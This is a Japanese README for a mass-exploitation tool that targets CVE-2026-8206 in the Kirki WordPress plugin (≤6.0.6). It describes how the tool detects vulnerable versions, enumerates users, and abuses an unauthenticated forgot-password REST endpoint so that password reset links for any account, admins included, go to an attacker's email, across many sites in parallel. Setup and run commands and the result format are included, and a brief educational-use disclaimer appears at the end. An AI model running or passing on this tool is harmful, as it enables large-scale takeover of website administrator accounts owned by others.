
CVE-2026-8206の大量悪用ツール – Kirki WordPressプラグイン(≤6.0.6)の'handle_forgot_password'を介した未認証の権限昇格。
CVE-2026-8206 用の大量悪用ツール – Kirki WordPress プラグイン(バージョン ≤ 6.0.6)の重大な脆弱性を悪用し、認証されていない攻撃者がパスワードリセットリンクを乗っ取って、管理者を含む任意のユーザーアカウントを乗っ取ることができます。
Kirki プラグインは、認証不要の REST エンドポイント(/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password)を公開しています。権限チェックの欠如と不適切なメール検証により、攻撃者は以下を行うことができます:
影響を受けるバージョン: ≤ 6.0.6
修正済みバージョン: 6.0.7
readme.txt と kirki.min.css をチェック(kirki と kirki-test フォルダの両方をサポート)/wp-json/wp/v2/users から実際のユーザー名を取得(フォールバック:admin)requests ライブラリconcurrent.futures(バックポート版、通常はインストール済み)依存関係をインストールします:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
スクリプトを編集して攻撃者メールを設定します:
ATTACKER_EMAIL = "[email protected]" # line ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – 1 行に 1 ドメインを記述したテキストファイル(http:///https:// の有無は問いません)[threads] – オプション、同時スレッド数(デフォルト:15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – 悪用に成功したターゲットを次の形式で保存:
URL|username|attacker_email|reset_link_sent_to_attacker_email
例:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
コンソール出力にリアルタイムの進行状況が表示されます:
/wp-content/plugins/{kirki,kirki-test}/readme.txt(Stable tag)と /.../kirki.min.css(ver パラメータ)をリクエストします。バージョンが ≤ 6.0.6 の場合、続行します。/wp-json/wp/v2/users を試行し、空の場合は admin にフォールバックします。username = ターゲットのユーザー名email = 攻撃者のメールアドレスemailBody = reset_link チップを含む JSON200 と "Email sent" で応答した場合、ターゲットは res.txt に書き込まれます。このソフトウェアは、教育目的および許可されたセキュリティテスト専用に提供されています。所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。作者は、このツールの誤用または損害について一切の責任を負いません。
詳細な免責事項は Jenderal92 のカバーに記載されています。こちらで確認できます。